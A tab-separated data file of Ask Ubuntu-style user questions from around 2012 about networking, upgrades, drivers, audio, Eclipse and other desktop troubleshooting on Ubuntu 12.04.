186947	/etc/network/interfaces ( skype works but my browser does n't )	i would like to configure my wlan0 so it would work with my router which is using wpa2 encription , and i would like my adress to be static not to interfere with other computers on the network . i removed network manager and wicd as i do n't like them and would also like to learn a bit more about how to set up a network connection myself . soo i started searching the web and came across many threads talking about how to reconfigure file /etc/network/interfaces . from my past experiences i connected to the router by typing 192.168.1.1 into browser adress bar and logged into my router settings panel , where i checked how two things are set : router ip adress : 192.168.1.1 subnet mask : 255.255.255.0 ( type c ) i looked even further into the problem and figured out that i can calculate my network ip by doing a logic `` bitwise and '' operation between router ip adress and subnet mask above . network ip : 192.168.1.0 this was perfectly clear to me so i decided to write my own /etc/network/interfaces file where i first wanted to set my static adress withouth configuring wpa2 encryption . my file now looked like this : auto wlan0 iface wlan0 inet static address 192.168.1.10 # this is an ip i want for my machine gateway 192.168.1.1 # this is an ip of my router netmask 255.255.255.0 # netmask i got from my router network 192.168.1.0 # i calculated this as described above broadcast 192.168.1.12 # ? ? ? only thing i do n't understand at the moment is a broadcast adress which i just set and i do n't even know what it does . i would need some explaination on this one . for setting the wpa2 i followed this guide and my file /etc/network/interfaces got a bit larger : auto wlan0 iface wlan0 inet static address 192.168.1.10 # this is an ip i want for my machine gateway 192.168.1.1 # this is an ip of my router netmask 255.255.255.0 # netmask i got from my router network 192.168.1.0 # i calculated this as described above broadcast 192.168.1.12 # ? ? ? wpa-driver wext wpa-ssid lausi wpa-ap-scan 2 wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk 8952a447c860d13847ba1cabd15314ba9caf2fb207f19598f90c43fcd43c0d97 well this looked ok so i saved my file /etc/network/interfaces and restarted my network using comand /etc/init.d/networking restart . although i got some error messages my skype client worked , but i could n't browse the web using my chrome browser . every addres like `` www.google.com '' ended up in a blank page with a warning that stating that the page does not exist . this was weird , but i remembered that in windows i allways had to specify my perferred dns server which translates words like `` www.google.com '' into an ip adress like `` 173.194.35.180 '' . you can check this by typing `` 173.194.35.180 '' into your browser addres bar and you will get the google site . well this problem could easily be solved by adding 1 last line into my /etc/network/interfaces and it might look weird to you but it is like this dns-nameservers 193.2.1.66 . this line tells my linux machine to look at address `` 193.2.1.66 '' where my internet provider keeps a database of translations from words like `` www.google.com '' to addresses like `` 173.194.35.180 '' and back . well in my final state my file /etc/network/interfaces looked like below and it worked perfectly : auto wlan0 iface wlan0 inet static address 192.168.1.10 # this is an ip i want for my machine gateway 192.168.1.1 # this is an ip of my router netmask 255.255.255.0 # netmask i got from my router network 192.168.1.0 # i calculated this as described above broadcast 192.168.1.12 # ? ? ? dns-nameservers 193.2.1.66 # dns server of my internet provider wpa-driver wext wpa-ssid lausi wpa-ap-scan 2 wpa-proto rsn wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk 8952a447c860d13847ba1cabd15314ba9caf2fb207f19598f90c43fcd43c0d97 but still i do n't know what is an broadcast ip address ...
186949	how to ugrade pdfsam ?	how to upgrade pdfsam from 1.1.4-1 version included in ubuntu sofware center to 2.2.1 version , either the basic or enhanced version , in ubuntu 12.04 ? i only found a possible solution here but it is for ubuntu 9.10 and the file system is different .
186951	ubuntu without any branding	( this question is out of interest and not because i have a problem with my machine . if it belongs to some other forum , tell me instead of downvoting me . ) i remember that a couple of years ago , there used to be a fork of ubuntu that included only free software . ( free as richard stallman would like . ) it did not have firefox , had iceweasle . it did not have proprietary stuff in the kernel or anything . i had installed it just when richard stallman had visited my college . did not like it at all as i could not use it for my laptop . does anyone know about/remember that os ? i just want the name .
186954	please help continue upgrade in terminal	i started upgrading to 12.10 in terminal and was asked what to do about a change in /etc/update-manager/release-upgrades vs /etc/update-manager/release-upgrades.dpkg-new . d was an option to see what the difference is between the two . i selected that and got this info : -- - /etc/update-manager/release-upgrades 2012-09-12 12:33:15.882829838 +0200 +++ /etc/update-manager/release-upgrades.dpkg-new 2012-08-08 16:39:07.000000000 +0200 @ @ -14,4 +14,4 @ @ # used if the currently-running release is not itself an lts # release , since in that case the upgrader wo n't be able to # determine if a newer release is available . -prompt=normal +prompt=normal ~ ( end ) the problem is i do not know what command to use to go back and continue the upgrade process : )
186958	where are webapps in tomcat6 ?	i have installed tomcat6 . i have also installed manager and host-manager webapps . i created user and i am able to run both from browser on remote machine . however i do n't know where these apps are deployed ? when i go to /var/lib/tomcat6/webapps/ i see only root dir . my /etc/default/tomcat6 does n't tell me where my catalina_home or catalina_base are ?
186961	how to connect with mobile broadband using a verizon lg usb	i have an lg-vl600 vzw broadband usb adapter that my company provides and it is activated and working on windows7 but ca n't get it working in ubuntu 12.04 . i 've created a mobile broadband connection in network connections and have all the settings setup as i believe they should be according to this raving rick blog post . i 'm not sure how to use this connection though . the broadband connection never shows in the list of connections to connect to and i do n't see any option to 'enable mobile broadband ' -though i 'm not sure if that is supposed to be there or not .
186963	need help migrating from wubi	i know this question has been asked , but i am looking for specific help with my partition selection . i want to migrate my install from wubi to be a dual boot . when i installed it i choose a small , partition , around 30gb . i am following these instructions : https : //help.ubuntu.com/community/migratewubi i see sda4 matches that size , but has mount point as '/host ' , am i okay to use this one ? edit : here is a screenshot of my partitions . http : //i.imgur.com/ozpe0.png my windows partition is actually not there , that is down as sdb1 , so safely out of the way ? i can confirm sda4 is the location of the 'virtual partition ' and is an otherwise , unused 26gb partition . it 's also where i would like to migrate to a full install to .
186971	usb internet dongle not working	i am using micromax usb dongle , it works well in windows 7 and also worked well in ubuntu 10.10 . when i upgraded to ubuntu 12.04 , it is not working in it . it does not show anything . when i start ubuntu it shows network disabled . if anyone has the solution kindly help .
186975	error during update 'unable to connect to 192.168.43.1:8000 '	when i tried to update my ubuntu through the update manager i received an error about some unknown resource . so i tried doing it from the terminal with sudo apt-get update but all i got is : 0 % [ connecting to 192.168.43.1 repeating itself ... and when i press enter it shows : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en unable to connect to 192.168.43.1:8000 : e : some index files failed to download . they have been ignored , or old ones used instead . how can i get this to work ?
186979	is it possible to auto-mount sshfs	is it possible to auto-mount a remote fs using sshfs upon instantiating a proper vpn connection ? allow me to explain the scenario , i 'm working remotely , to do that it helps if i can mount my home dir from a server in the office . to do that i need to vpn in . so within network manager i select the relevant vpn and connect . it connects but now i have to drop to the command line and mount my home dir on several machines . if i forget to do one machine my local dev environment is n't as efficient . i suppose i could write a quick bash script to do this but i 'd rather get it running automatically when i connect .
186981	how to auto-mount a copied encrypted home	how can i auto-mount and use my encrypted home that i copied to another partition on the same hard disk ? i 'm running ubuntu 11.10 . my encrypted home is on sda1 . there i 've 2 users : usera and userb . another partition is sda3 on which i have some other data . btw , sda1 is formatted as ext4 , sda3 is formatted as ext3 . i did the following : i logged out from gui ( gnome ) and changed ( using ctrl+alt+f1 ) to the shell . from there i logged in , changed to sudo ( using sudo -s ) . after then i created a new mountpoint ( tmp ) under /mnt ( mkdir /mnt/tmp ) mounted /dev/sda3 on that mountpoint /mnt/tmp ( mount /dev/sda3 /mnt/tmp ) copied my encrypted /home to /mnt/tmp using rsync ( rsync -- acvxasxh -- progress -- stats /home/ /mnt/tmp/ ) . after the “copy-procedure” i looked to my “new home” in /mnt/tmp and there i found the following 3 folders : usera , userb , .ecryptfs my structure for /dev/sda3 mounted on /mnt/tmp looks like the following ( userb in ecryptfs i 've not listed ) : ┬usera │ ├userb │ ├.ecryptfs │ ├usera │ ├ auto-mount │ ├ auto-umount │ ├ private.mnt │ ├ private.sig │ ├ wrapped-passphrase │ ├ .wrapped-passphrase.recorded │ ├ .private ├ ( encrypted file_1 ) ├ ( encrypted file_2 ) ├ ( encrypted file_n ) now i would like that this copy of the original home-directory should act with the same behavior as the original home-directory means , that it should be auto-mounted at reboot and give me access to my unencrypted files and after logout all my files should be encrypted again . any suggestions ?
186983	sudo aptitude upgrade error	i get the following error when trying to upgrade media @ media : ~ $ sudo aptitude upgrade resolving dependencies ... the following new packages will be installed : linux-headers-3.2.0-30 { a } linux-headers-3.2.0-30-generic-pae { a } linux-image-3.2.0-30-generic-pae { a } the following packages will be upgraded : apport apport-gtk build-essential firefox firefox-globalmenu firefox-gnome-support firefox-locale-en gir1.2-totem-1.0 glib-networking glib-networking-common glib-networking-services libssl1.0.0 libtotem0 linux-firmware linux-generic-pae linux-headers-generic-pae linux-image-generic-pae linux-libc-dev openjdk-7-jre-lib openssl policykit-1-gnome python-apport python-gst0.10 python-problem-report totem totem-common totem-mozilla totem-plugins xserver-xorg-input-synaptics 29 packages upgraded , 3 newly installed , 0 to remove and 5 not upgraded . need to get 0 b/104 mb of archives . after unpacking 180 mb will be used . do you want to continue ? [ y/n/ ? ] extracting templates from packages : 100 % preconfiguring packages ... ( reading database ... 90 % dpkg : unrecoverable fatal error , aborting : files list file for package 'libgnome-keyring0 ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : does anyone know how to fix ? thanks , nudbot
186984	installing ubuntu retaining ntfs drives	i have windows vista pre-installed on my laptop . i have 4 ntfs drives ( c , d , e , f ) on my laptop . i have os installed on c drive and my data on other drives . now , i have to switch to ubuntu completely . so , i want to install ubuntu on c drive . is it possible not to touch other drives and access all data from ubuntu ? p.s.- i am very new to linux/ubuntu.hence , i am sorry if my question sounds weird .
186985	how do i instal skype on imac g5 ubuntu 12.04.1 ?	so i have this imac g5 model 8.7 running powerpc64 . i ca n't install any of the .debs they have on skype.com because they 're the wrong architecture and i also tried adding the partner repo for the software center but when i do sudo apt-get install skype it says it ca n't find the package as if the repo i just added does n't exist . i added the repo with the following command : sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' i 'm running ubuntu release 12.04 ( precise ) 32-bit kernel linux 3.2.0-31-powerpc64-smp gnome 3.4.2
186986	eclipse has multiple issues after jre-6 ( openjdk ) upgrade	i 'm on 12.04 lts , and trying to use eclipse indigo . this morning ubuntu made me update the following packages : preparing to replace icedtea-6-jre-cacao 6b24-1.11.3-1ubuntu0.12.04.1 ( using ... /icedtea-6-jre-cacao_6b24-1.11.4-1ubuntu0.12.04.1_amd64.deb ) ... unpacking replacement icedtea-6-jre-cacao ... preparing to replace openjdk-6-jre-lib 6b24-1.11.3-1ubuntu0.12.04.1 ( using ... /openjdk-6-jre-lib_6b24-1.11.4-1ubuntu0.12.04.1_all.deb ) ... unpacking replacement openjdk-6-jre-lib ... preparing to replace icedtea-6-jre-jamvm 6b24-1.11.3-1ubuntu0.12.04.1 ( using ... /icedtea-6-jre-jamvm_6b24-1.11.4-1ubuntu0.12.04.1_amd64.deb ) ... unpacking replacement icedtea-6-jre-jamvm ... preparing to replace openjdk-6-jre-headless 6b24-1.11.3-1ubuntu0.12.04.1 ( using ... /openjdk-6-jre-headless_6b24-1.11.4-1ubuntu0.12.04.1_amd64.deb ) ... unpacking replacement openjdk-6-jre-headless ... preparing to replace openjdk-6-jre 6b24-1.11.3-1ubuntu0.12.04.1 ( using ... /openjdk-6-jre_6b24-1.11.4-1ubuntu0.12.04.1_amd64.deb ) ... unpacking replacement openjdk-6-jre ... after that ( but i can not swear it is the root cause ) , i have the following issues in eclipse : when trying to launch the simplest helloworld program ( which behaves fine with manual javac/java ) , i get either nothing or : an internal error occurred during : `` launching helloworld '' . org/eclipse/jdt/debug/core/jdidebugmodel i get an `` error log '' tab in the console panel , with an error : could not create the view : an unexpected exception was thrown . ( follows a consequent nullpointerexception stacktrace between sun.util.calendar.zoneinfofile.getzoneids ( zoneinfofile.java:785 ) and org.eclipse.equinox.launcher.main.main ( main.java:1386 ) ) when trying to access the installed jres part of the preferences , i get a popup saying : unable to create the selected preference page . an error occurred while automatically activating bundle org.eclipse.jdt.debug.ui ( 162 ) . and the preference tab says an error has occurred when creating this preference page . until today i had a manually installed eclipse ( one of the official bundles available on their site ) , i 've tried to replace it by the repository version and i get the same errors . what should i do to make eclipse work again ? another person reports : same happened to me after updating last night . already tried reinstalling eclipse and java , starting eclipse with -clean and starting new workspace and new .eclipse dir , but nothing helps .
186989	pidgin will not open with upgrade to 12.04	clicking on the icon does nothing . when i try to open it from the command-line i get this error : pidgin : symbol lookup error : pidgin : undefined symbol : purple_dbus_get_connection i have updated and upgraded everything . i had this same issue in ubuntu 10.04 which required me to purge the pidgin ppa and downgrade all of the pidgin dependencies . how can this be fixed ? i ran sudo ldconfig and tried to run it again but this did n't work .
186991	blank screen after ubuntu 12 installation	on my dell laptop , running with windows 7 , i installed ubuntu 12 . i used it for sometime , then i re-started to switch to windows . first time it got boot up with windows but then it got hanged . i re-started again and then blank screen with blinking cursor came and beep sounds also started to came . i read in few forums and this seems like a common issue with ubuntu . i tried using the bootable usb for both windows 7 and ubuntu but none of these are even getting detected . please let me know if any of know the work-around . below is configuration '' machine : dell studio bios : phoenix os : windows 7 motherboard : intel
186999	wireless networks are not detected at start up in ubuntu 12.04	i have recently ( three four days ago ) installed ubuntu 12.04 via windows installer i.e . wubi.exe . after the installation completed wireless and ethernet were both working well . but after restart wireless networks did n't show up while in the network manager both networking and wireless were enabled . though sometimes after boot it did show the networks available but very rarely . so i went through various posts regarding wireless issues in ubuntu 12.04 and tried so many things but ended up in nothing satisfactory . i have broadcom 4313 lan network controller and brcmsmac driver . then relying on some suggestions i tried to install bcm-wl driver but could n't install due to some error in jockeyl.log file . then i tried fresh installation of the same driver but still could resolve the startup issues with wireless . then again i reinstalled ubuntu inside windows using wubi installer . this time again same problem occurred after boot . but this time i successfully installed wl driver before disturbing file-system files of ubuntu . but again the same issue . this time i noticed some new things : if i inserted ethernet/lan cable before startup then wireless networks are available and of course lan ( wired ) networks also work . but if i do n't plug in cable before startup and then plug it after startup then it did n't detect ethernet network neither wireless . so i have n't noticed it before that lan along with wifi also does n't work after startup . but if i suspend the session and make it sleep and again login then it worked . i tried it every time that wlan worked perfectly . but still i m unable to resolve that startup problem . each time i boot first i have to suspend it once then only networks are available . it irritates me each time i reboot/boot my lappy . so please help out of this problem . any ideas/help regarding this issue would be highly appreciated . some of the commands that i run gave following results : # lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 04:00.0 ethernet controller : atheros communications inc. ar8152 v1.1 fast ethernet ( rev c1 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) # sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 70 : f1 : a1:49 : b6 : ab width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.1.7 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : f0500000-f0503fff *-network description : ethernet interface product : ar8152 v1.1 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c1 serial : b8 : ac:6f:6b : f7:4a capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : f0400000-f043ffff ioport:2000 ( size=128 ) # lsmod | grep wl wl 2568210 0 lib80211 14381 2 lib80211_crypt_tkip , wl # sudo iwlist eth1 scanning eth1 scan completed : cell 01 - address : 30:46:9a:85 : da:9a essid : '' bh dashir 2 '' mode : managed frequency:2.462 ghz ( channel 11 ) quality:4/5 signal level : -60 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd7f0050f204104a00011010440001021041000100103b000103104700109afe7d908f8e2d381860668ba2e8d8771021000d4e4554474541522c20496e632e10230009574752363134763130102400095747523631347631301042000538333235381054000800060050f204000110110009574752363134763130100800020084 encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s cell 02 - address : c0:3f:0e : eb:45:14 essid : '' bh dashir 3 '' mode : managed frequency:2.462 ghz ( channel 11 ) quality:2/5 signal level : -71 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd7f0050f204104a00011010440001021041000100103b00010310470010f3c9bbe499d140540f530e7ebede2f671021000d4e4554474541522c20496e632e10230009574752363134763130102400095747523631347631301042000538333235381054000800060050f204000110110009574752363134763130100800020084 encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s cell 03 - address : a0:21 : b7 : a8:2f : c0 essid : '' bh dashir 4 '' mode : managed frequency:2.422 ghz ( channel 3 ) quality:1/5 signal level : -86 dbm noise level : -98 dbm ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd8b0050f204104a0001101044000102103b0001031047001000000000000010000000a021b7a82fc01021000d4e6574676561722c20496e632e10230009574e523130303076321024000456324831104200046e6f6e651054000800060050f20400011011001b574e5231303030763228576972656c6573732041502d322e344729100800020086103c000103 encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s
187001	move the position of the opened apps in the taskbar with the mouse or keyboard	is there any desktop environment , windows manager or fork of ubuntu 12.04 that permits moving the apps in the taskbar ( traditional taskbar , not unity left panel ) ? ? ? ? you know , for example in firefox i can change the position of the tabs . i would like to do the same for the apps in the taskbar . i tried xfce , but it doesnt work..
187011	how do i add the trash icon to the desktop in ubuntu 12.04 using gnome3 ?	so i 'm running ubuntu 12.04.1 on my imac g5 powerpc64 and i want to add the trash icon to the desktop . how do i do that ? please note , i am not using unity . i tried hitting alt-f2 and typing gconf-editor but it says that there is no such file or directory . please help !
187013	set wallpaper in the lock screen	is there an app or some way to set the desktop wallpaper as viewable when only logged in , and to set another when logged out or locked ? i 've tried ubuntu tweak , but it only does the login wallpaper , and does n't do the lock screen wallpaper .
187019	which filesystem hierarchy standard is in ubuntu ?	which file system hierarchy standard does ubuntu 12.04 using ? & what are the changes ? on wikipedia the latest version is v3.0 ( 2012-07-01 )
187022	how can i send a custom desktop notification ?	i have a custom script and i want to send a desktop notification ( the one that appears in the top right corner of the screen ) with a custom message . how do i do that ?
187024	how do i get rid of buzzing sound while watching youtube ?	so , i 'm running ubuntu 12.04.1 on my imac g5 and i think i have gnash installed as a flash player . the videos on youtube load fine even though mozilla tells me from time to time that i need a flash plugin , i get video image just fine but as for the sound it 's all just a scratching buzzing static . sound works well like testing and listening to music . please help !
187032	no audio in flash player , both chromium and firefox	i use kubuntu 12.04 lts , and in firefox and chromium the adobe flash plugin will not play audio . google chrome 's plugin works , but i do n't really like chrome/chromium , i installed chromium only to test it . i tried various versions of the plugin and both adoble-flashplayer and flashplugin-installer . tried the `` delete .pulse and create some files '' fix and did n't worked too . tried every single fixd i found in web and nope , did n't work .
187033	nvidia geforce4 4200 go ( dell mobile ) driver	i have a dell inspiron 8500 and would like a driver for the graphics card that works ok with 12.04 . the one supplied makes the cursor sketchy and windows appear with black lines and fuzzy sections , after a while the whole screen locks up . many thanks for any advice .
187038	can not open ubuntu software center	i deleted some unnecessary icon themes and now my application icons are changed . i can not open ubuntu software center also ... . the following message is displayed ... . success @ user-pc : ~ $ software-center 2012-09-12 22:24:52,048 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-09-12 22:24:52,055 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 142 , in < module > app = softwarecenterappgtk3 ( datadir , xapian_base_path , options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 387 , in __init__ self.datadir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/historypane.py '' , line 78 , in __init__ self._get_emblems ( self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/historypane.py '' , line 192 , in _get_emblems pb = icons.load_icon ( emblem , self.icon_size , 0 ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : icon 'package-install ' not present in theme i also tried the following code to change the icon but no didnt work ... . gksu gedit /usr/share/applications/ubuntu-software-center.desktop
187041	installation of amd 12.8 drivers failing , why ?	i recently downloaded the latest version of the amd raedon driver 12.8 from this link : - driver_12.8 for my brand new 12.04 install with a default kernel version 3.2.0-29 and has followed the link : - to install the graphics driver but i have tried several times , i get no error while installation but in the end when i run amdcccle i get this : - any help is very appreciated
187042	how to launch phonon-kde ?	i removed pulseaudio and reloaded alsa , all of a sudden a phonon gui showed up where i could change the more preferred audio device . but i cant launch it ( or i do n't know the command ) in the terminal ? ( it was a kde application , do n't know why . )
187045	how do i integrate gmail ?	can anyone give me step by step idea to install integrated gmail in ubuntu 12.04 with screen-shots and steps till end . it would be very helpful for other new users as well .
187052	copy from main system and paste in vbox	how can i copy the information from my main ubuntu system and paste that information in the virtualbox system ? i have tried with general command like ctrl + c & ctrl + v , but they are not working .is there any way i can achieve that ? thank you .
187059	ca n't install adobe flash plugin	every time i am try to install adobe flash plug-in via ubuntu software center , i get the error message : package dependencies can not be resolved i tried various commands in the terminal but i could n't fix the problem .
187071	how do i restart /shutdown from a terminal ?	how to shutdown the ubuntu installed system and restart it by using terminal ?
187077	configure flags	what is the ubuntu way of downloading the source for a package and then building it while passing specific flags to the configure portion of the process ? i hope i 'm explaining what i mean properly . installing from source follows almost always the following procedure : ./configure -- flag-1 -- flag-2 make & & make install how can i get control over specifying flags1 and 2 in the configure process ?
187081	how do i get my epiphany buttons back ?	running epiphany on ubuntu 12.04 on an imac g5 powerpc . the only button i have is a `` web '' button inside the browser and a wheel on the far right corner . i ca n't for example set a home page , unless there is a terminal command to do so . i do n't have a view button either ... does anyone else have this problem ?
187083	how to find support for specific package version in upcoming ubuntu versions	if an user wanted to look for example , for a version of a specific package in a new version of ubuntu , let 's say , i want to know if ubuntu 12.10 will have alsa 1.0.26 or if it will have mesa 9.0 . how will i go about looking for this information ? what places can i check directly to search for this specific info ?
187086	how do i set up live audio streams to a dlna compliant device ?	is there a way to stream the live output of the soundcard from our 12.04.1 lts amd64 desktop to a dlna-compliant external device in our network ? selecting media content in shared directories using rygel , minidlna , and ushare is always fine - but so far we completely failed to get a live audio stream to a client via dlna . pulseaudio claims to have a dlna/upnp media server that together with rygel is supposed to do just this . but we were unable to get it running . we followed the steps outlined in live.gnome.org , this answer here , and also in another similar guide . as soon as we select the local audio device , or our gst-launch stream in the dlna client rygel displays the following message and the client states it reached the end of the playlist : ( rygel:7380 ) : rygel-warning ** : rygel-http-request.vala:97 : invalid seek request this is how we configured gst-launch in rygel.conf : [ gstlaunch ] enabled=true launch-items=mypulseaudiosink mypulseaudiosink-title=audio on @ hostname @ mypulseaudiosink-mime=audio/x-wav mypulseaudiosink-launch=pulsesrc device= < device > ! wavpackenc for < device > we tried with the default sink name , this name appended with .monitor , and in addition with upnp-sink and upnp.monitor that was created when we selected dlna media server from paprefs . we also tried to encode using lamemp3enc with no luck . these are our pulseaudio modules : http : //paste.ubuntu.com/1202913/ these are our sinks : http : //paste.ubuntu.com/1202916/ did we miss any other additional configuration needed to get this running ? are there any other alternatives for sending the audio of our soundcard as live stream to a dlna client ?
187088	recovering an ubuntu installation - ubuntu eats itself after 'sudo apt-get install -f '	updater ( i assume ) put a no entry style alert icon on the panel which informed me that certain package dependencies were not up to snuff . upgrades were thereafter only partial . the dialogue advised that i sudo apt-get install -f. i did this hoping that app-get would fulfil dependencies and replace corrupted files and watched it systematically remove every component of linux , both the stuff i had installed and the core ubuntu packages . i could only assume at this stage that this was in preparation for a fresh install but , of course , i know better now - if you find yourself with apt-get warning you that you are about to remove several hundred packages and asking you to type an involved confirmation string seek advice before proceeding . i digress . this was a 64 bit install of 12.04 . all that is left is grub pointing to a couple of windows recovery partitions on the hard drive . thankfully the ext4 partition is reachable from a stick boot . edit : i 've logged onto the machine with a 64 bit stick and can see the file structure left behind by apt-get after { ahem } fixing . my first instinct was to run install from the stick but it seemed to want to do another install rather than a repair . my question then : is there a way to recover the current installation so that if i reinstall the packages i had they will pick up the original settings ? i 'm particularly worried about losing email from evolution - the rest i could probably lash back together . as for the use of ppa i 'm not sure what you 're driving at . i generally use ubuntu software centre to install software , though i have used terminal scripts to add new repositories and software successfully following guidance on various websites . the most recent change i made was a downgrade of wine in an attempt to install and run excel2007 ( a necessity , i think , as i have vba work to do ) . the installer had stalled and had to be killed . i wonder if that corrupted whatever database holds a model of the package installation structure . i would also be interested to know how this disaster came about . i see people in the know recommending the sudo apt-get install -f as a fairly innocuous cure in similar circumstances . thanks for your attention , tony martin p.s . do please forgive the rant aspects of the original post . it 's hard to write rationally with a large hole in the pit of your stomach .
187092	bluetooth from the command line in 12.04 ?	i 've been trying to pair up my bluetooth keyboard with my computer after reinstalling from a standard ubuntu 12.04 to a minimal install . in the minimal install i have no gui , so i 've been trying to use the various command line tools available , but i ca n't figure out how the pairing is supposed to go . pairing when i had a gui worked flawlessly . i 've asked for help here : http : //ubuntuforums.org/showthread.php ? p=12234695 no one has replied but a lot of details of my situation is available there . how is one supposed to pair bluetooth devices from the command line ?
187097	how to change music output in moc , alsa	i 've been using moc for a while on a laptop and it is great , but then i wanted to plug in usb radio as an output , rhythmbox and other players detected new output device , but moc has output hardcoded in ~/.moc/config , where is stated : # sound driver - oss , alsa , jack , sndio ( on openbsd ) or null ( only for # debugging ) . # you can enter more than one driver as a colon-separated list . the first # working driver will be used . sounddriver = jack : alsa : oss # jack output settings . jackoutleft = `` alsa_pcm : playback_1 '' jackoutright = `` alsa_pcm : playback_2 '' # oss output device . ossdevice = /dev/dsp # oss mixer device . ossmixerdevice = /dev/mixer # oss mixer channel : pcm or master . ossmixerchannel = pcm # second oss mixer channel : pcm or master . ossmixerchannel2 = master # alsa mixer device . alsamixer = pcm # second alsa mixer device . alsamixer2 = master # alsa output device . alsadevice = default and i have no idea , what to change . some tutorial on devices and some additional help is needed . i suppose , i have to change something in alsa , but neither in moc nor in alsamixer , i do not know how to check , where is my usb device and what to change .
187101	what package ( helper app ) does recoll need to index images ?	the file- > show_missing_helpers menu item in the recoll gui mentions the following missing helper ( among others ) : perl : :image : :exiftool ( image/gif image/jpeg image/png image/tiff image/x-xcf ) per the recoll user manual i installed the perl image exif tool ( and library ) : sudo aptitude install libimage-exif-perl libimage-exiftool-perl but recoll still lists the missing helper and fails to index images . uname -a : linux alssd 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux
